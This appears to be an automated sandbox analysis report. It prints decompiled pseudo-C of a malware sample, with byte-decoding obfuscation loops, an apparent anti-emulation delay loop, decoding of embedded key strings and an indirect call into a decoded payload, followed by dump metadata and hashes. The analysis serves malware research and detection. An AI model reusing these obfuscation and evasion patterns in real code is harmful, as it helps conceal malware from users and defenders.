                                                                                                                                                                                            					_v109 =  ~(_v109 & 0x000000ff);
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) - _v108;
                                                                                                                                                                                            					_v109 =  !(_v109 & 0x000000ff);
                                                                                                                                                                                            					_v109 = (_v109 & 0x000000ff) - _v108;
                                                                                                                                                                                            					_t167 = _v109;
                                                                                                                                                                                            					 *((char*)(_t180 + _v108 - 0x4c)) = _t167;
                                                                                                                                                                                            					_t129 = _v108 + 1;
                                                                                                                                                                                            					_v108 = _t129;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 = 0;
                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                            				while(_v12 < 0x275c1) {
                                                                                                                                                                                            					_v104 = _v104 + 1;
                                                                                                                                                                                            					_t129 = _v12 + 1;
                                                                                                                                                                                            					_v12 = _t129;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				if(_v104 == 0x275c1) {
                                                                                                                                                                                            					_v148 = 0;
                                                                                                                                                                                            					_v124 = 0;
                                                                                                                                                                                            					_v144 = 0x590813;
                                                                                                                                                                                            					_v120 =  *0x410b60;
                                                                                                                                                                                            					_v140 = 0;
                                                                                                                                                                                            					_t130 = E004018A0(_t129,  &E00414008, 0x77e); // executed
                                                                                                                                                                                            					_v132 = _t130;
                                                                                                                                                                                            					_v128 = _t167;
                                                                                                                                                                                            					_v116 = E004029C0(E00401800("POV4hp3Hy7tF1r2mRcyJQShwuYLPyzbthqZzNp7CCyGFyKvyRJlHqw85jP5SCwXdkLDIkFB2K7r75g0fQpJlsAHiCg",  &E00414008, 0x77e, 0x5b));
                                                                                                                                                                                            					E00401000(_t132, "RCIQBtiW8MmD6t8dGH1NYhsgS0ukDxQMA7SGoU9l9ZL80gcXtklbmWlFEEvlXnOtvfHqg6ro67U1XREOfMpREVkKTM", 0x414788, 0x22400);
                                                                                                                                                                                            					_t134 = E00403140( &_v80); // executed
                                                                                                                                                                                            					_t137 =  *((intOrPtr*)(_v116 +  &E00414008))(_t134, 0, 0x414788, 0x5b); // executed
                                                                                                                                                                                            					return _t137;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				return _t129;
                                                                                                                                                                                            			}

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleFree
                                                                                                                                                                                            • String ID: #$'$2$2$5$;$C$H$M$M$O$POV4hp3Hy7tF1r2mRcyJQShwuYLPyzbthqZzNp7CCyGFyKvyRJlHqw85jP5SCwXdkLDIkFB2K7r75g0fQpJlsAHiCg$RCIQBtiW8MmD6t8dGH1NYhsgS0ukDxQMA7SGoU9l9ZL80gcXtklbmWlFEEvlXnOtvfHqg6ro67U1XREOfMpREVkKTM$U$V$Z$Z$m$o$u$w
                                                                                                                                                                                            • API String ID: 771614528-1928178049
                                                                                                                                                                                            • Opcode ID: 201285a32bab26850b9d6ae3d34b33511898034da1b3a26e99d0f912af0b52a8
                                                                                                                                                                                            • Instruction ID: a9f4db38adb6773be6d368baaa60883427108d02990b535e66ec9317f0dc76b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 201285a32bab26850b9d6ae3d34b33511898034da1b3a26e99d0f912af0b52a8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F91EE20D087D98ADF22CBFD98547DDBFB15F27225F184289E4E87B2D2C2690285C766
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                            			E004018A0(signed int __eax, void* _a4, long _a8) {
                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                            				char _v18;
                                                                                                                                                                                            				char _v19;
                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                            				char _v21;
                                                                                                                                                                                            				char _v22;
                                                                                                                                                                                            				char _v23;
                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                            				char _v25;
                                                                                                                                                                                            				char _v26;
                                                                                                                                                                                            				char _v27;
                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                            				long _v40;
                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                            				char _v58;
                                                                                                                                                                                            				char _v59;
                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                            				char _v61;
                                                                                                                                                                                            				char _v62;
                                                                                                                                                                                            				char _v63;
                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                            				char _v65;
                                                                                                                                                                                            				char _v66;
                                                                                                                                                                                            				char _v67;
                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                            				char _v69;
                                                                                                                                                                                            				char _v70;
                                                                                                                                                                                            				char _v71;
                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                            				struct HINSTANCE__* _v76;
                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                            				signed char _v112;
                                                                                                                                                                                            				signed int _v113;
                                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                                            				signed int _v121;
                                                                                                                                                                                            				signed char _t648;
                                                                                                                                                                                            				void* _t746;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t648 = __eax;
                                                                                                                                                                                            				_v80 =  *0x410938;
                                                                                                                                                                                            				_v80 =  *0x410934;
                                                                                                                                                                                            				_v80 =  *0x410930;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((__eax & 0x00000044) == 0) {
                                                                                                                                                                                            					_v80 =  *0x41092c;
                                                                                                                                                                                            					_v80 =  *0x410928;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v80 =  *0x410924;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v80 =  *0x410920;
                                                                                                                                                                                            					_v80 =  *0x41091c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v80 =  *0x410918;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v80 =  *0x410914;
                                                                                                                                                                                            					_v80 =  *0x410910;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v80 =  *0x41090c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v80 =  *0x410908;
                                                                                                                                                                                            					_v80 =  *0x410904;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v80 =  *0x410900;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v80 =  *0x4108fc;
                                                                                                                                                                                            					_v80 =  *0x4108f8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v108 =  *0x4108f4;
                                                                                                                                                                                            				_v108 =  *0x4108f0;
                                                                                                                                                                                            				_v108 =  *0x4108ec;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v108 =  *0x4108e8;
                                                                                                                                                                                            					_v108 =  *0x4108e4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v108 =  *0x4108e0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v108 =  *0x4108dc;
                                                                                                                                                                                            					_v108 =  *0x4108d8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v108 =  *0x4108d4;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v108 =  *0x4108d0;
                                                                                                                                                                                            					_v108 =  *0x4108cc;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v108 =  *0x4108c8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v108 =  *0x4108c4;
                                                                                                                                                                                            					_v108 =  *0x4108c0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v108 =  *0x4108bc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v108 =  *0x4108b8;
                                                                                                                                                                                            					_v108 =  *0x4108b4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 =  *0x4108b0;
                                                                                                                                                                                            				_v104 =  *0x4108ac;
                                                                                                                                                                                            				_v104 =  *0x4108a8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v104 =  *0x4108a4;
                                                                                                                                                                                            					_v104 =  *0x4108a0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 =  *0x41089c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v104 =  *0x410898;
                                                                                                                                                                                            					_v104 =  *0x410894;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 =  *0x410890;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v104 =  *0x41088c;
                                                                                                                                                                                            					_v104 =  *0x410888;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 =  *0x410884;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v104 =  *0x410880;
                                                                                                                                                                                            					_v104 =  *0x41087c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v104 =  *0x410878;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v104 =  *0x410874;
                                                                                                                                                                                            					_v104 =  *0x410870;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v84 =  *0x41086c;
                                                                                                                                                                                            				_v84 =  *0x410868;
                                                                                                                                                                                            				_v84 =  *0x410864;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v84 =  *0x410860;
                                                                                                                                                                                            					_v84 =  *0x41085c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v84 =  *0x410858;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v84 =  *0x410854;
                                                                                                                                                                                            					_v84 =  *0x410850;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v84 =  *0x41084c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v84 =  *0x410848;
                                                                                                                                                                                            					_v84 =  *0x410844;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v84 =  *0x410840;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v84 =  *0x41083c;
                                                                                                                                                                                            					_v84 =  *0x410838;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v84 =  *0x410834;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v84 =  *0x410830;
                                                                                                                                                                                            					_v84 =  *0x41082c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v44 =  *0x410828;
                                                                                                                                                                                            				_v44 =  *0x410824;
                                                                                                                                                                                            				_v44 =  *0x410820;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v44 =  *0x41081c;
                                                                                                                                                                                            					_v44 =  *0x410818;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v44 =  *0x410814;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v44 =  *0x410810;
                                                                                                                                                                                            					_v44 =  *0x41080c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v44 =  *0x410808;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v44 =  *0x410804;
                                                                                                                                                                                            					_v44 =  *0x410800;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v44 =  *0x4107fc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v44 =  *0x4107f8;
                                                                                                                                                                                            					_v44 =  *0x4107f4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v44 =  *0x4107f0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v44 =  *0x4107ec;
                                                                                                                                                                                            					_v44 =  *0x4107e8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v56 =  *0x4107e4;
                                                                                                                                                                                            				_v56 =  *0x4107e0;
                                                                                                                                                                                            				_v56 =  *0x4107dc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v56 =  *0x4107d8;
                                                                                                                                                                                            					_v56 =  *0x4107d4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v56 =  *0x4107d0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v56 =  *0x4107cc;
                                                                                                                                                                                            					_v56 =  *0x4107c8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v56 =  *0x4107c4;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v56 =  *0x4107c0;
                                                                                                                                                                                            					_v56 =  *0x4107bc;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v56 =  *0x4107b8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v56 =  *0x4107b4;
                                                                                                                                                                                            					_v56 =  *0x4107b0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v56 =  *0x4107ac;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v56 =  *0x4107a8;
                                                                                                                                                                                            					_v56 =  *0x4107a4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v96 =  *0x4107a0;
                                                                                                                                                                                            				_v96 =  *0x41079c;
                                                                                                                                                                                            				_v96 =  *0x410798;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v96 =  *0x410794;
                                                                                                                                                                                            					_v96 =  *0x410790;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v96 =  *0x41078c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v96 =  *0x410788;
                                                                                                                                                                                            					_v96 =  *0x410784;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v96 =  *0x410780;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v96 =  *0x41077c;
                                                                                                                                                                                            					_v96 =  *0x410778;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v96 =  *0x410774;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v96 =  *0x410770;
                                                                                                                                                                                            					_v96 =  *0x41076c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v96 =  *0x410768;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v96 =  *0x410764;
                                                                                                                                                                                            					_v96 =  *0x410760;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v36 =  *0x41075c;
                                                                                                                                                                                            				_v36 =  *0x410758;
                                                                                                                                                                                            				_v36 =  *0x410754;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v36 =  *0x410750;
                                                                                                                                                                                            					_v36 =  *0x41074c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v36 =  *0x410748;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v36 =  *0x410744;
                                                                                                                                                                                            					_v36 =  *0x410740;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v36 =  *0x41073c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v36 =  *0x410738;
                                                                                                                                                                                            					_v36 =  *0x410734;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v36 =  *0x410730;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v36 =  *0x41072c;
                                                                                                                                                                                            					_v36 =  *0x410728;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v36 =  *0x410724;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v36 =  *0x410720;
                                                                                                                                                                                            					_v36 =  *0x41071c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v72 = 4;
                                                                                                                                                                                            				_v71 = 0xac;
                                                                                                                                                                                            				_v70 = 0xcb;
                                                                                                                                                                                            				_v69 = 0x2c;
                                                                                                                                                                                            				_v68 = 0xcb;
                                                                                                                                                                                            				_v67 = 0x2f;
                                                                                                                                                                                            				_v66 = 0xcf;
                                                                                                                                                                                            				_v65 = 0xa4;
                                                                                                                                                                                            				_v64 = 0xc;
                                                                                                                                                                                            				_v63 = 0x31;
                                                                                                                                                                                            				_v62 = 0x4f;
                                                                                                                                                                                            				_v61 = 0x63;
                                                                                                                                                                                            				_v60 = 0x43;
                                                                                                                                                                                            				_v59 = 0x6e;
                                                                                                                                                                                            				_v58 = 0xcb;
                                                                                                                                                                                            				_v112 = 0;
                                                                                                                                                                                            				while(_v112 < 0xf) {
                                                                                                                                                                                            					_v113 =  *((intOrPtr*)(_t746 + _v112 - 0x44));
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) >> 0x00000005 | (_v113 & 0x000000ff) << 0x00000003;
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) - _v112;
                                                                                                                                                                                            					_v113 =  ~(_v113 & 0x000000ff);
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) + _v112;
                                                                                                                                                                                            					_v113 =  !(_v113 & 0x000000ff);
                                                                                                                                                                                            					_v113 = _v113 & 0x000000ff ^ 0x000000c0;
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) + _v112;
                                                                                                                                                                                            					_v113 = _v113 & 0x000000ff ^ _v112;
                                                                                                                                                                                            					_v113 =  ~(_v113 & 0x000000ff);
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) + _v112;
                                                                                                                                                                                            					_v113 = _v113 & 0x000000ff ^ 0x000000f8;
                                                                                                                                                                                            					_v113 =  !(_v113 & 0x000000ff);
                                                                                                                                                                                            					_v113 = _v113 & 0x000000ff ^ 0x000000d4;
                                                                                                                                                                                            					_v113 = (_v113 & 0x000000ff) >> 0x00000001 | (_v113 & 0x000000ff) << 0x00000007;
                                                                                                                                                                                            					_v113 = _v113 & 0x000000ff ^ 0x0000002f;
                                                                                                                                                                                            					 *((char*)(_t746 + _v112 - 0x44)) = _v113;
                                                                                                                                                                                            					_t648 = _v112 + 1;
                                                                                                                                                                                            					_v112 = _t648;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v52 =  *0x410718;
                                                                                                                                                                                            				_v52 =  *0x410714;
                                                                                                                                                                                            				_v52 =  *0x410710;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v52 =  *0x41070c;
                                                                                                                                                                                            					_v52 =  *0x410708;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v52 =  *0x410704;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v52 =  *0x410700;
                                                                                                                                                                                            					_v52 =  *0x4106fc;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v52 =  *0x4106f8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v52 =  *0x4106f4;
                                                                                                                                                                                            					_v52 =  *0x4106f0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v52 =  *0x4106ec;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v52 =  *0x4106e8;
                                                                                                                                                                                            					_v52 =  *0x4106e4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v52 =  *0x4106e0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v52 =  *0x4106dc;
                                                                                                                                                                                            					_v52 =  *0x4106d8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v48 =  *0x4106d4;
                                                                                                                                                                                            				_v48 =  *0x4106d0;
                                                                                                                                                                                            				_v48 =  *0x4106cc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v48 =  *0x4106c8;
                                                                                                                                                                                            					_v48 =  *0x4106c4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v48 =  *0x4106c0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v48 =  *0x4106bc;
                                                                                                                                                                                            					_v48 =  *0x4106b8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v48 =  *0x4106b4;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v48 =  *0x4106b0;
                                                                                                                                                                                            					_v48 =  *0x4106ac;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v48 =  *0x4106a8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v48 =  *0x4106a4;
                                                                                                                                                                                            					_v48 =  *0x4106a0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v48 =  *0x41069c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v48 =  *0x410698;
                                                                                                                                                                                            					_v48 =  *0x410694;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v12 =  *0x410690;
                                                                                                                                                                                            				_v12 =  *0x41068c;
                                                                                                                                                                                            				_v12 =  *0x410688;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v12 =  *0x410684;
                                                                                                                                                                                            					_v12 =  *0x410680;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v12 =  *0x41067c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v12 =  *0x410678;
                                                                                                                                                                                            					_v12 =  *0x410674;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v12 =  *0x410670;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
